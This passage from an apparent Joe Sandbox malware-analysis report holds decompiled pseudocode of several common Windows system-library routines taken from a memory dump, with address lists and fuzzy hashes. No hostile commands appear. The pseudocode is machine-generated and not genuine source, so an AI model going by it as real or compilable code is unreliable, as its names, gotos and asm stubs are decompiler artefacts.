									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E045E2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x045fef4b
0x045fef4d
0x045fef57
0x045ff0bd
0x045ff0c2
0x045ff0d2
0x045ff0d2
0x045ff0c2
0x045fef5d
0x045fef5f
0x045fef67
0x045fef6a
0x045fef6d
0x045fef74
0x045fef7f
0x045fef82
0x045fef82
0x045fef86
0x045fef88
0x045fef8c
0x045fef8f
0x045fef8f
0x045fef8f
0x00000000
0x045fef91
0x045fef93
0x045fefc4
0x045fefc4
0x045fefc4
0x045fefca
0x045fefd0
0x045ff0a6
0x00000000
0x00000000
0x045ff0af
0x0464bb06
0x0464bb0a
0x045ff0b5
0x045ff0b5
0x045ff0b5
0x045ff0b5
0x00000000
0x045fefd6
0x045fefd9
0x045ff0de
0x045ff0e2
0x045fefdf
0x045fefdf
0x045fefdf
0x045fefe5
0x0464bafc
0x0464bafc
0x045fefe5
0x045fefeb
0x045fefed
0x045ff00f
0x045ff011
0x045ff01a
0x045ff01d
0x045ff021
0x045ff028
0x045ff029
0x045ff029
0x045ff02c
0x00000000
0x045ff02c
0x045feff3
0x045feff9
0x045ff0ea
0x045ff0ed
0x045ff0ef
0x00000000
0x045ff0ef
0x045ff003
0x0464bb12
0x045ff045
0x045ff049
0x045ff051
0x045ff09e
0x045ff0a0
0x045ff0a0
0x045ff09e
0x045ff053
0x045ff064
0x045ff064
0x045ff06b
0x0464bb1a
0x0464bb1a
0x045ff071
0x045ff071
0x045ff07d
0x045ff082
0x045ff08f
0x045ff08f
0x045ff009
0x045ff00d
0x00000000
0x045ff00d
0x045fefd0
0x045fef97
0x045fefa5
0x045fefaa
0x00000000
0x045fefac
0x045fefac
0x045fefac
0x00000000
0x045fefb2
0x045ff036
0x045ff03a
0x045ff040
0x045ff090
0x00000000
0x045ff092
0x045ff042
0x00000000
0x045ff042
0x045fefb7
0x045fefb9
0x045fefbc
0x045fefb0
0x045fefb0
0x00000000
0x045fefbe
0x045fefbe
0x045fefc1
0x00000000
0x045fefc1
0x045fefbc
0x045fefaa
0x045fef91

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: 4a88a0d41fdbea7d999a216b427419f840c71c755d7700e3508610a0749d4d5b
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: D0512431A04245EFDB24CF68D8C17AEBBB1BF45304F1881A9CB4693381E375B989E742

Uniqueness

Uniqueness Score: -1.00%

Function 046B740D Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E046B740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0463D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0462F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L04604620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L04604620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0462F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L04604620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x046b740d
0x046b740d
0x046b7412
0x046b7413
0x046b7416
0x046b7418
0x046b741c
0x046b741f
0x046b7422
0x046b7422
0x046b7428
0x046b742a
0x046b742a
0x046b7451
0x046b7432
0x046b744f
0x046b744f
0x00000000
0x046b7434
0x046b7438
0x046b7443
0x046b7517
0x046b7517
0x046b751a
0x046b7535
0x046b7520
0x046b7527
0x046b752c
0x046b7531
0x046b7533
0x00000000
0x046b7533
0x00000000
0x046b7531
0x046b754b
0x046b754f
0x046b755c
0x046b755c
0x046b755f
0x046b7560
0x046b7561
0x046b7562
0x046b7563
0x046b7568
0x046b756a
0x046b756c
0x046b756d
0x046b756d
0x046b756f
0x046b7572
0x046b7574
0x046b7577
0x046b757c
0x046b757f
0x00000000
0x046b7551
0x046b7551
0x046b7551
0x046b7553
0x046b7553
0x046b7449
0x046b7449
0x046b744c
0x046b744c
0x00000000
0x046b744c
0x046b7443
0x046b750e
0x046b7514
0x046b7514
0x046b7455
0x046b7469
0x046b746d
0x00000000
0x046b7473
0x046b7473
0x046b7476
0x046b7480
0x046b7484
0x046b748e
0x046b7493
0x046b7493
0x046b7496
0x046b7499
0x046b74a1
0x046b74b1
0x046b74b5
0x00000000
0x046b74bb
0x046b74c1
0x046b74c1
0x046b74c4
0x046b74c5
0x046b74c6
0x046b74c7
0x046b74c8
0x046b74cd
0x00000000
0x046b74d3
0x046b74d3
0x046b74d6
0x046b74d8
0x046b74db
0x046b74dd
0x046b74e0
0x046b74e7
0x046b74ee
0x046b74ee
0x046b74f4
0x046b74f9
0x00000000
0x046b74fb
0x046b74fb
0x046b74fd
0x046b7500
0x046b7503
0x046b7505
0x046b7505
0x046b74f9
0x00000000
0x046b74cd
0x046b74b5
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 731dc99c98f026b6951669e1dfa668d6c0077e6da1c4e926aa1ed3aac50a74d1
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 0B517D72600606EFDB15CF14C580A96BBB5FF85305F15C1AAE9089F251FB71E986CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 04612990 Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E04612990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x46bff00);
				E0463D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x45c1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0462E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x45c1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E046651BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x45c166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E04612AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E045F6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E04612C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E045FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E04612AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E04612C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E04612ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0463D0D1(_t62);
				goto L28;
			}

0x04612990
0x04612992
0x04612997
0x046129a3
0x046129a6
0x046129ab
0x046129ad
0x046129b2
0x04655c80
0x046129b8
0x046129b8
0x046129bb
0x046129c0
0x046129c5
0x046129c6
0x046129c6
0x046129cb
0x00000000
0x00000000
0x046129cd
0x046129d0
0x046129d9
0x046129db
0x046129dd
0x04612a7f
0x04612a84
0x04612a87
0x04612a89
0x04655ca1
0x04655ca3
0x00000000
0x04612a8f
0x04612a8f
0x00000000
0x04612a8f
0x00000000
0x046129e3
0x046129e3
0x046129e3
0x00000000
0x046129e3
0x046129dd
0x00000000
0x046129db
0x046129e6
0x046129e9
0x046129eb
0x046129ed
0x046129f3
0x046129f5
0x046129f8
0x046129fa
0x04612a97
0x04612a9a
0x04612a9d
0x04612add
0x00000000
0x04612a9f
0x04612aa2
0x04612aa5
0x04612aa8
0x04612aab
0x04655cab
0x04655caf
0x04655cc5
0x04655cda
0x04655cdc
0x04655cdf
0x04655ce5
0x00000000
0x04655ceb
0x04655ced
0x04655cee
0x00000000
0x04655cee
0x04655cb1
0x04655cb4
0x04655cb9
0x04655cbb
0x00000000
0x04655cbd
0x04655cbd
0x00000000
0x04655cbd
0x04655cbb
0x04612ab1
0x04612ab1
0x04612ac4
0x04612ac6
0x04612ac6
0x00000000
0x04612ac6
0x04612aab
0x00000000
0x04612a00
0x04612a09
0x04612a0e
0x04612a21
0x04612a24
0x04612a35
0x04612a3a
0x04612a3d
0x04612a42
0x04612a59
0x04612a59
0x04612a5c
0x04612a5f
0x04612a5f
0x046129fa
0x046129f3
0x04612a64
0x04612a64
0x04612a6b
0x04612a6b
0x04612a6d
0x04612a72
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c853e7061a4f554610e1051de8fc725ff57d5a7cfbab4aa1254098c3b805666
Instruction ID: f3c1b8d936edb56924ccd2daf9ad30cdae865ac84a277fa5664f69bdedeaf689
Opcode Fuzzy Hash: 8c853e7061a4f554610e1051de8fc725ff57d5a7cfbab4aa1254098c3b805666
Instruction Fuzzy Hash: 76514A71A00209AFDF25DF59C890ADEBBB5BF48314F088099E8116B320E331A952DF90

Uniqueness

Uniqueness Score: -1.00%

Function 04614D3B Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04614D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x46dd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0462FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x46d7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0462B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L04604620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E045ECCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0462B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0462F380(_t67 + 0xc, 0x45c5138, 0x10) == 0) {
								 *0x46d60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E04614F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E04614E70(0x46d86b0, 0x4615690, 0, 0) != 0) {
					_t46 = E045ECCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x04614d3b
0x04614d4d
0x04614d53
0x04614d58
0x04614d65
0x04614d6c
0x04614d71
0x04614d77
0x04614d7f
0x04614d8c
0x04614d8e
0x04614dad
0x04614db0
0x04614db7
0x04614db8
0x04614db9
0x04614dba
0x04614dbb
0x04614dc1
0x04614dc8
0x04614dcc
0x04614dd5
0x04614dde
0x04614ddf
0x04614de0
0x04614de1
0x04614de6
0x04614de7
0x04614de9
0x04614df3
0x00000000
0x00000000
0x04656c7c
0x04656c8a
0x04656c8a
0x04656c9d
0x04656ca7
0x04656cac
0x04656cb2
0x04656cb9
0x00000000
0x04656cbf
0x04656cbf
0x00000000
0x04656cbf
0x04656cb9
0x04614dfb
0x04656ccf
0x04656cd3
0x04614e32
0x04614e39
0x04656ce0
0x04656cf2
0x04656cf2
0x04656ce0
0x04614e3f
0x04614e41
0x04614e51
0x04614e51
0x04614e03
0x04614e03
0x04614e09
0x04614e0f
0x04614e57
0x00000000
0x00000000
0x04614e1b
0x04614e30
0x04614e5b
0x04614e5b
0x00000000
0x04614e30
0x04614e11
0x04614e11
0x04614e16
0x00000000
0x04614e16
0x04614e01
0x00000000
0x04614e01
0x04614da5
0x04656c6b
0x00000000
0x04614dab
0x04614dab
0x00000000
0x04614dab

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 362bbcd07d86939dd16b6af8517074be1cb54db408b1374b81a624ee3b3d67d4
Instruction ID: 8fa988e580685da8259f62a3f4875a480fcc2b425d0c7ea27757ff01364460c1
Opcode Fuzzy Hash: 362bbcd07d86939dd16b6af8517074be1cb54db408b1374b81a624ee3b3d67d4
Instruction Fuzzy Hash: D341AF71A40318AFEB21DF14C980F6AB7A9EB55714F08409AE9499B3A0FB74FD40CA91

Uniqueness

Uniqueness Score: -1.00%

Function 04614BAD Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E04614BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x46dd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E045ECC50(_t86);
					L11:
					return E0462B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x46d8504
				E04602280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0462FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0462B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L04604620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E045ECCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x46d8504
								E045FFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E04614F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x04614bad
0x04614bbf
0x04614bc2
0x04614bc6
0x04614bcd
0x04614bd9
0x046567fe
0x04656800
0x04614ccc
0x04614ccd
0x04614cb7
0x04614cc9
0x04614cc9
0x04614bdf
0x04614be5
0x00000000
0x00000000
0x04614beb
0x04614bef
0x00000000
0x00000000
0x04614bf5
0x04614bf9
0x04614c06
0x04614c0b
0x04614c17
0x04614c1c
0x04614c1f
0x04614c25
0x04614c33
0x04614c3d
0x04614c40
0x04614c43
0x04614c47
0x04614c4d
0x04614c53
0x04614c54
0x04614c55
0x04614c56
0x04614c5b
0x04614c5c
0x04614c63
0x04614c6b
0x00000000
0x00000000
0x04656776
0x04656784
0x04656784
0x0465679f
0x046567a7
0x046567af
0x046567ce
0x00000000
0x046567b1
0x046567b7
0x046567b8
0x046567c1
0x046567d3
0x046567d9
0x046567dd
0x04614c94
0x04614c94
0x04614c98
0x04614c9c
0x04614ca3
0x046567f4
0x046567f4
0x04614cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x04614cb5
0x04614c79
0x04614c7e
0x04614c89
0x04614c8b
0x04614c8f
0x04614c8f
0x00000000
0x04614c89
0x046567c3
0x00000000
0x046567c3
0x046567af
0x04614c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4984cdff8613137ce14aa0d9eb99342469750e04bb2bed49923d004701343736
Instruction ID: b55d7fda1c50866eeaa2afda2fcb60b3b976b80ea8d8e20bb17a06512ddc5c0e
Opcode Fuzzy Hash: 4984cdff8613137ce14aa0d9eb99342469750e04bb2bed49923d004701343736
